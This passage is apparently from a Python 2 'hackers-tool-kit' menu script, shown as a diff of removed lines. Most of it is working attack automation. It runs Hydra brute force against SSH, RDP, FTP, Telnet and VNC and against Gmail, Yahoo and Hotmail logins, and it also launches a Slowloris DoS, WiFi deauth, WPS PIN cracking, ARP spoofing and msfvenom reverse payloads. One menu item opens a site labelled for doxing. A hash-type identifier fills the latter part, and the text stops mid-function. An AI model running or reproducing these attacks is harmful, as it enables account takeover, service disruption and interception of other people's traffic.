raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - print "\nExamples: py, php, exe\n" - s = raw_input("File Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and 